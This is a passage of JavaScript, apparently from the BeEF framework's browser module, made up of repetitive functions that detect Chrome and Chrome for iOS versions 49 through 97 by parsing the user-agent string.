return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 49) ? true : false);
},
/**
* Returns true if Chrome for iOS 49.
* @example: beef.browser.isC49iOS()
*/
isC49iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 49) ? true : false);
},
/**
* Returns true if Chrome 50.
* @example: beef.browser.isC50()
*/
isC50: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 50) ? true : false);
},
/**
* Returns true if Chrome for iOS 50.
* @example: beef.browser.isC50iOS()
*/
isC50iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 50) ? true : false);
},
/**
* Returns true if Chrome 51.
* @example: beef.browser.isC51()
*/
isC51: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 51) ? true : false);
},
/**
* Returns true if Chrome for iOS 51.
* @example: beef.browser.isC51iOS()
*/
isC51iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 51) ? true : false);
},
/**
* Returns true if Chrome 52.
* @example: beef.browser.isC52()
*/
isC52: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 52) ? true : false);
},
/**
* Returns true if Chrome for iOS 52.
* @example: beef.browser.isC52iOS()
*/
isC52iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 52) ? true : false);
},
/**
* Returns true if Chrome 53.
* @example: beef.browser.isC53()
*/
isC53: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 53) ? true : false);
},
/**
* Returns true if Chrome for iOS 53.
* @example: beef.browser.isC53iOS()
*/
isC53iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 53) ? true : false);
},
/**
* Returns true if Chrome 54.
* @example: beef.browser.isC54()
*/
isC54: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 54) ? true : false);
},
/**
* Returns true if Chrome for iOS 54.
* @example: beef.browser.isC54iOS()
*/
isC54iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 54) ? true : false);
},
/**
* Returns true if Chrome 55.
* @example: beef.browser.isC55()
*/
isC55: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 55) ? true : false);
},
/**
* Returns true if Chrome for iOS 55.
* @example: beef.browser.isC55iOS()
*/
isC55iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 55) ? true : false);
},
/**
* Returns true if Chrome 56.
* @example: beef.browser.isC56()
*/
isC56: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 56) ? true : false);
},
/**
* Returns true if Chrome for iOS 56.
* @example: beef.browser.isC56iOS()
*/
isC56iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 56) ? true : false);
},
/**
* Returns true if Chrome 57.
* @example: beef.browser.isC57()
*/
isC57: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 57) ? true : false);
},
/**
* Returns true if Chrome for iOS 57.
* @example: beef.browser.isC57iOS()
*/
isC57iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 57) ? true : false);
},
/**
* Returns true if Chrome 58.
* @example: beef.browser.isC58()
*/
isC58: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 58) ? true : false);
},
/**
* Returns true if Chrome for iOS 58.
* @example: beef.browser.isC58iOS()
*/
isC58iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 58) ? true : false);
},
/**
* Returns true if Chrome 59.
* @example: beef.browser.isC59()
*/
isC59: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 59) ? true : false);
},
/**
* Returns true if Chrome for iOS 59.
* @example: beef.browser.isC59iOS()
*/
isC59iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 59) ? true : false);
},
/**
* Returns true if Chrome 60.
* @example: beef.browser.isC60()
*/
isC60: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 60) ? true : false);
},
/**
* Returns true if Chrome for iOS 60.
* @example: beef.browser.isC60iOS()
*/
isC60iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 60) ? true : false);
},
/**
* Returns true if Chrome 61.
* @example: beef.browser.isC61()
*/
isC61: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 61) ? true : false);
},
/**
* Returns true if Chrome for iOS 61.
* @example: beef.browser.isC61iOS()
*/
isC61iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 61) ? true : false);
},
/**
* Returns true if Chrome 62.
* @example: beef.browser.isC62()
*/
isC62: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 62) ? true : false);
},
/**
* Returns true if Chrome for iOS 62.
* @example: beef.browser.isC62iOS()
*/
isC62iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 62) ? true : false);
},
/**
* Returns true if Chrome 63.
* @example: beef.browser.isC63()
*/
isC63: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 63) ? true : false);
},
/**
* Returns true if Chrome for iOS 63.
* @example: beef.browser.isC63iOS()
*/
isC63iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 63) ? true : false);
},
/**
* Returns true if Chrome 64.
* @example: beef.browser.isC64()
*/
isC64: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 64) ? true : false);
},
/**
* Returns true if Chrome for iOS 64.
* @example: beef.browser.isC64iOS()
*/
isC64iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 64) ? true : false);
},
/**
* Returns true if Chrome 65.
* @example: beef.browser.isC65()
*/
isC65: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 65) ? true : false);
},
/**
* Returns true if Chrome for iOS 65.
* @example: beef.browser.isC65iOS()
*/
isC65iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 65) ? true : false);
},
/**
* Returns true if Chrome 66.
* @example: beef.browser.isC66()
*/
isC66: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 66) ? true : false);
},
/**
* Returns true if Chrome for iOS 66.
* @example: beef.browser.isC66iOS()
*/
isC66iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 66) ? true : false);
},
/**
* Returns true if Chrome 67.
* @example: beef.browser.isC67()
*/
isC67: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 67) ? true : false);
},
/**
* Returns true if Chrome for iOS 67.
* @example: beef.browser.isC67iOS()
*/
isC67iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 67) ? true : false);
},
/**
* Returns true if Chrome 68.
* @example: beef.browser.isC68()
*/
isC68: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 68) ? true : false);
},
/**
* Returns true if Chrome for iOS 68.
* @example: beef.browser.isC68iOS()
*/
isC68iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 68) ? true : false);
},
/**
* Returns true if Chrome 69.
* @example: beef.browser.isC69()
*/
isC69: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 69) ? true : false);
},
/**
* Returns true if Chrome for iOS 69.
* @example: beef.browser.isC69iOS()
*/
isC69iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 69) ? true : false);
},
/**
* Returns true if Chrome 70.
* @example: beef.browser.isC70()
*/
isC70: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 70) ? true : false);
},
/**
* Returns true if Chrome for iOS 70.
* @example: beef.browser.isC70iOS()
*/
isC70iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 70) ? true : false);
},
/**
* Returns true if Chrome 71.
* @example: beef.browser.isC71()
*/
isC71: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 71) ? true : false);
},
/**
* Returns true if Chrome for iOS 71.
* @example: beef.browser.isC71iOS()
*/
isC71iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 71) ? true : false);
},
/**
* Returns true if Chrome 72.
* @example: beef.browser.isC72()
*/
isC72: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 72) ? true : false);
},
/**
* Returns true if Chrome for iOS 72.
* @example: beef.browser.isC72iOS()
*/
isC72iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 72) ? true : false);
},
/**
* Returns true if Chrome 73.
* @example: beef.browser.isC73()
*/
isC73: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 73) ? true : false);
},
/**
* Returns true if Chrome for iOS 73.
* @example: beef.browser.isC73iOS()
*/
isC73iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 73) ? true : false);
},
/**
* Returns true if Chrome 74.
* @example: beef.browser.isC74()
*/
isC74: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 74) ? true : false);
},
/**
* Returns true if Chrome for iOS 74.
* @example: beef.browser.isC74iOS()
*/
isC74iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 74) ? true : false);
},
/**
* Returns true if Chrome 75.
* @example: beef.browser.isC75()
*/
isC75: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 75) ? true : false);
},
/**
* Returns true if Chrome for iOS 75.
* @example: beef.browser.isC75iOS()
*/
isC75iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 75) ? true : false);
},
/**
* Returns true if Chrome 76.
* @example: beef.browser.isC76()
*/
isC76: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 76) ? true : false);
},
/**
* Returns true if Chrome for iOS 76.
* @example: beef.browser.isC76iOS()
*/
isC76iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 76) ? true : false);
},
/**
* Returns true if Chrome 77.
* @example: beef.browser.isC77()
*/
isC77: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 77) ? true : false);
},
/**
* Returns true if Chrome for iOS 77.
* @example: beef.browser.isC77iOS()
*/
isC77iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 77) ? true : false);
},
/**
* Returns true if Chrome 78.
* @example: beef.browser.isC78()
*/
isC78: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 78) ? true : false);
},
/**
* Returns true if Chrome for iOS 78.
* @example: beef.browser.isC78iOS()
*/
isC78iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 78) ? true : false);
},
/**
* Returns true if Chrome 79.
* @example: beef.browser.isC79()
*/
isC79: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 79) ? true : false);
},
/**
* Returns true if Chrome for iOS 79.
* @example: beef.browser.isC79iOS()
*/
isC79iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 79) ? true : false);
},
/**
* Returns true if Chrome 80.
* @example: beef.browser.isC80()
*/
isC80: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 80) ? true : false);
},
/**
* Returns true if Chrome for iOS 80.
* @example: beef.browser.isC80iOS()
*/
isC80iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 80) ? true : false);
},
/**
* Returns true if Chrome 81.
* @example: beef.browser.isC81()
*/
isC81: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 81) ? true : false);
},
/**
* Returns true if Chrome for iOS 81.
* @example: beef.browser.isC81iOS()
*/
isC81iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 81) ? true : false);
},
/**
* Returns true if Chrome 82.
* @example: beef.browser.isC82()
*/
isC82: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 82) ? true : false);
},
/**
* Returns true if Chrome for iOS 82.
* @example: beef.browser.isC82iOS()
*/
isC82iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 82) ? true : false);
},
/**
* Returns true if Chrome 83.
* @example: beef.browser.isC83()
*/
isC83: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 83) ? true : false);
},
/**
* Returns true if Chrome for iOS 83.
* @example: beef.browser.isC83iOS()
*/
isC83iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 83) ? true : false);
},
/**
* Returns true if Chrome 84.
* @example: beef.browser.isC84()
*/
isC84: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 84) ? true : false);
},
/**
* Returns true if Chrome for iOS 84.
* @example: beef.browser.isC84iOS()
*/
isC84iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 84) ? true : false);
},
/**
* Returns true if Chrome 85.
* @example: beef.browser.isC85()
*/
isC85: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 85) ? true : false);
},
/**
* Returns true if Chrome for iOS 85.
* @example: beef.browser.isC85iOS()
*/
isC85iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 85) ? true : false);
},
/**
* Returns true if Chrome 86.
* @example: beef.browser.isC86()
*/
isC86: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 86) ? true : false);
},
/**
* Returns true if Chrome for iOS 86.
* @example: beef.browser.isC86iOS()
*/
isC86iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 86) ? true : false);
},
/**
* Returns true if Chrome 87.
* @example: beef.browser.isC87()
*/
isC87: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 87) ? true : false);
},
/**
* Returns true if Chrome for iOS 87.
* @example: beef.browser.isC87iOS()
*/
isC87iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 87) ? true : false);
},
/**
* Returns true if Chrome 88.
* @example: beef.browser.isC88()
*/
isC88: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 88) ? true : false);
},
/**
* Returns true if Chrome for iOS 88.
* @example: beef.browser.isC88iOS()
*/
isC88iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 88) ? true : false);
},
/**
* Returns true if Chrome 89.
* @example: beef.browser.isC89()
*/
isC89: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 89) ? true : false);
},
/**
* Returns true if Chrome for iOS 89.
* @example: beef.browser.isC89iOS()
*/
isC89iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 89) ? true : false);
},
/**
* Returns true if Chrome 90.
* @example: beef.browser.isC90()
*/
isC90: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 90) ? true : false);
},
/**
* Returns true if Chrome for iOS 90.
* @example: beef.browser.isC90iOS()
*/
isC90iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 90) ? true : false);
},
/**
* Returns true if Chrome 91.
* @example: beef.browser.isC91()
*/
isC91: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 91) ? true : false);
},
/**
* Returns true if Chrome for iOS 91.
* @example: beef.browser.isC91iOS()
*/
isC91iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 91) ? true : false);
},
/**
* Returns true if Chrome 92.
* @example: beef.browser.isC92()
*/
isC92: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 92) ? true : false);
},
/**
* Returns true if Chrome for iOS 92.
* @example: beef.browser.isC92iOS()
*/
isC92iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 92) ? true : false);
},
/**
* Returns true if Chrome 93.
* @example: beef.browser.isC93()
*/
isC93: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 93) ? true : false);
},
/**
* Returns true if Chrome for iOS 93.
* @example: beef.browser.isC93iOS()
*/
isC93iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 93) ? true : false);
},
/**
* Returns true if Chrome 94.
* @example: beef.browser.isC94()
*/
isC94: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 94) ? true : false);
},
/**
* Returns true if Chrome for iOS 94.
* @example: beef.browser.isC94iOS()
*/
isC94iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 94) ? true : false);
},
/**
* Returns true if Chrome 95.
* @example: beef.browser.isC95()
*/
isC95: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 95) ? true : false);
},
/**
* Returns true if Chrome for iOS 95.
* @example: beef.browser.isC95iOS()
*/
isC95iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 95) ? true : false);
},
/**
* Returns true if Chrome 96.
* @example: beef.browser.isC96()
*/
isC96: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 96) ? true : false);
},
/**
* Returns true if Chrome for iOS 96.
* @example: beef.browser.isC96iOS()
*/
isC96iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 96) ? true : false);
},
/**
* Returns true if Chrome 97.
* @example: beef.browser.isC97()
*/
isC97: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 97) ? true : false);
},
/**
* Returns true if Chrome for iOS 97.
* @example: beef.browser.isC97iOS()
*/
isC97iOS: function () {
